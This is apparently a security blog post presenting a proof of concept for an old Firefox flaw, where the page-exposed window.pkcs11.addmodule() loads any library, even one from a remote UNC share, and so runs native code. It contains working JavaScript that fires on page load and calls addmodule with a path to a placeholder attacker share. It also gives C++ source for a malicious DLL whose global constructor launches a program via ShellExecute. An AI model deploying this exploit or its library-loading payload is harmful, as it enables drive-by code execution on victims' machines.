This is a handy way to get native code executed on a victim's machine from the browser. Kudos to Jesse Ruderman and Dan Kaminsky for the bug discovery and POC.
Essentially, in Firefox up through 3.0.13 (my Ubuntu 9.04 box is running 3.0.11), there is a publicly exposed JavaScript function, window.pkcs11.addmodule(), which tells Firefox to load a library from whatever path the page supplies and register it as a PKCS#11 crypto module. Nothing about the file is checked before it is loaded, so assuming you're able to place a malicious library (see below) somewhere the target can reach, a web page can get that machine to load, and therefore execute, it. Extra win: the path can be a UNC path, so the library can sit on a share you control instead of on the victim's disk 🙂
Source is here. Note that the page is live, but the path it hands to addmodule() points at a crypto library that does not exist, so nothing actually gets loaded.
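The browser side of the technique, as an added example rather than the POC page linked above: it calls window.pkcs11.addmodule(moduleName, libraryFullPath, cryptoMechanismFlags, cipherFlags) with a UNC path. The host name in the UNC path is a placeholder, and loadPkcs11Module() takes the window object as a parameter only so the logic can be exercised outside a browser; neither is part of the original.

```javascript
// Added example (not the original POC): drives the Firefox API the post describes.
// window.pkcs11.addmodule(moduleName, libraryFullPath, cryptoMechanismFlags, cipherFlags)
// makes NSS load libraryFullPath as a PKCS#11 module. Loading is enough: any
// global constructor or DllMain in the library runs before NSS ever asks it for
// a PKCS#11 function list, so the file does not need to be a real module.
const MODULE_NAME = "pkunkcs";
// Placeholder UNC path (attacker.example is not a real host). A UNC path lets
// Firefox fetch the DLL over SMB from a share the attacker controls.
const LIBRARY_PATH = "\\\\attacker.example\\share\\pkunkcs.dll";

// Returns { supported, status }: supported is false on builds that do not expose
// window.pkcs11 (or have removed addmodule), status is whatever addmodule returned.
function loadPkcs11Module(win, name, libraryPath) {
  if (!win || !win.pkcs11 || typeof win.pkcs11.addmodule !== "function") {
    return { supported: false, status: null };
  }
  // Zero for both flag arguments: no mechanisms or ciphers need to be claimed
  // for the library to be loaded.
  const status = win.pkcs11.addmodule(name, libraryPath, 0, 0);
  return { supported: true, status };
}

// In a browser, fire on page load; under node (no window) this is skipped.
if (typeof window !== "undefined") {
  const result = loadPkcs11Module(window, MODULE_NAME, LIBRARY_PATH);
  console.log("pkcs11 API present:", result.supported, "addmodule returned:", result.status);
}
```

On a patched or modern browser the function simply reports that the API is absent, which is the quick check to run if you want to know whether a given Firefox build still exposes it.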
The malicious library does not have to implement any of the PKCS#11 interface. In the POC the payload sits in the constructor of the library's CpkunkcsApp class (the MFC wizard's application object, which exists as a global instance); global constructors run when the DLL is loaded, so the code below executes the moment Firefox loads the library, and in this case it just calls ShellExecute to pop calc.exe.
```cpp
#include <windows.h>
#include <shellapi.h>
#include <cstring>

// Application object of the malicious "PKCS#11" DLL. The class declaration and
// the global instance below are the usual MFC layout, added so the snippet builds.
class CpkunkcsApp {
public:
    CpkunkcsApp();
};

CpkunkcsApp::CpkunkcsApp()
{
    const char *str = "c:\\windows\\system32\\calc.exe";
    size_t len = strlen(str) + 1;                 // include the terminator
    wchar_t *wText = new wchar_t[len];            // original allocated strlen(str), one wchar_t short
    memset(wText, 0, len * sizeof(wchar_t));
    ::MultiByteToWideChar(CP_ACP, 0, str, -1, wText, (int)len);
    ::ShellExecuteW(NULL, NULL, wText, NULL, NULL, SW_SHOW);  // launch calc.exe
    delete[] wText;
}

CpkunkcsApp theApp;   // global instance: constructed, and the payload run, at DLL load
```
